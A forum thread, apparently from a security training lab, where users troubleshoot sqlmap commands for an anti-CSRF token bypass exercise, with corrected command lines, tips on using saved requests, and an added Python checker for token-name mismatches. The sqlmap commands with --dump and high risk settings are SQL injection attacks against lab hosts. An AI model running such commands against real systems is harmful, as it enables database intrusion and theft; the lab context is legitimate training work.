Bypassing Web Application Protections - SQLMAP ESSENTIALS

Hello everyone!

I’ve been trying to get the flag 8, which is “anti-CSRF token bypass”.

So far I’m trying to use the following command but with no results:

sqlmap -u '178.62.63.223:30888/case8.php?id=1' --data="id=1&csrf-token=DsRfWoI75zL4PEhyhnxhyjP0b7CRB8JvIaM6s6Xw" --csrf-token="t0ken" --dump --batch --level 5 --risk 3

Can someone please give me a tip?

Hey! Looks like you have a few issues:

# You have GET params, but are using the --data switch.
sqlmap -u '178.62.63.223:30888/case8.php?id=1'
# T0ken parameter names don't match
--data="id=1&csrf-token=DsRfWoI75zL4PEhyhnxhyjP0b7CRB8JvIaM6s6Xw" --csrf-token="t0ken"
# You probably don't need level or risk once you get the other stuff fixed.
--dump --batch --level 5 --risk 3

You are getting close. Keep going.
-onthesauce

2 Likes

Thank you man.

I’m sorry for the late response. You’re saving me again, seriously I LOVE YOU

1 Like

Hello!
OK, now I have been stuck for days… I am facing the error with everything I try on the machine… I am trying the following options in my query
anti-CSRF token 't0ken' can't be found at 'http://206.189.118.125:32235/case8.php'. You can try to rerun by providing a valid value for option '--csrf-url'

and receiving the following error

anti-CSRF token 't0ken' can't be found at 'http://206.189.118.125:32235/case8.php'. You can try to rerun by providing a valid value for option '--csrf-url'

Can anyone tell me what is wrong in my sqlmap?

1 Like
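
The two mismatches pointed out in the first reply, and the "can't be found at" error quoted in the post above, written as a pre-flight check on the command line (an added example, not part of the original thread and not sqlmap's own code). The host `target.example`, the token value `AAAA`, the form markup and the assumption that the form's hidden field is named `t0ken` are constructed for illustration.

```python
import shlex
from html.parser import HTMLParser
from urllib.parse import parse_qs

WANTED = {"-u", "--url", "--data", "--csrf-token"}

class InputFields(HTMLParser):
    """Collect the name of every <input> element in a page."""
    def __init__(self):
        super().__init__()
        self.names = set()

    def handle_starttag(self, tag, attrs):
        name = dict(attrs).get("name")
        if tag == "input" and name:
            self.names.add(name)

def parse_options(cmdline):
    """Pull out the options of interest; accepts '--opt=value' and '--opt value'."""
    args, opts = shlex.split(cmdline), {}
    for i, arg in enumerate(args):
        key, eq, val = arg.partition("=")
        if key in WANTED:
            opts[key] = val if eq else (args[i + 1] if i + 1 < len(args) else "")
    return opts

def lint_csrf(cmdline, page_html):
    """Return problem codes for the --csrf-token setup of one command line."""
    opts = parse_options(cmdline)
    token = opts.get("--csrf-token")
    if not token:
        return ["no-csrf-token-option"]
    url = opts.get("-u") or opts.get("--url") or ""
    query = url.partition("?")[2].partition("#")[0]
    get_names = set(parse_qs(query, keep_blank_values=True))
    post_names = set(parse_qs(opts.get("--data", ""), keep_blank_values=True))
    page = InputFields()
    page.feed(page_html)
    checks = [
        # the option names a parameter that the request never sends
        ("token-name-not-in-request", token not in get_names | post_names),
        # the fetched page has no form field of that name to refresh from
        ("token-not-in-page", token not in page.names),
        # the same parameter is given in the URL and again in --data
        ("param-in-url-and-data", bool(get_names & post_names)),
    ]
    return [code for code, failed in checks if failed]

# Constructed samples: placeholder host and token value, field name assumed.
FORM = '<form method="post"><input name="id"><input type="hidden" name="t0ken" value="AAAA"></form>'
BROKEN = """sqlmap -u 'http://target.example/case8.php?id=1' --data="id=1&csrf-token=AAAA" --csrf-token="t0ken" """
FIXED = "sqlmap -u 'http://target.example/case8.php' --data='id=1&t0ken=AAAA' --csrf-token=t0ken"
```

`lint_csrf(BROKEN, FORM)` reports the name mismatch and the duplicated `id` parameter, while `lint_csrf(FIXED, FORM)` returns an empty list.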

A more foolproof and super easy method is just to save the request and use -r request.req and just add the --csrf flag :wink:

Cool challenges!
Interestingly, is it possible to do this manually without peeking into the sqlmap output? :thinking: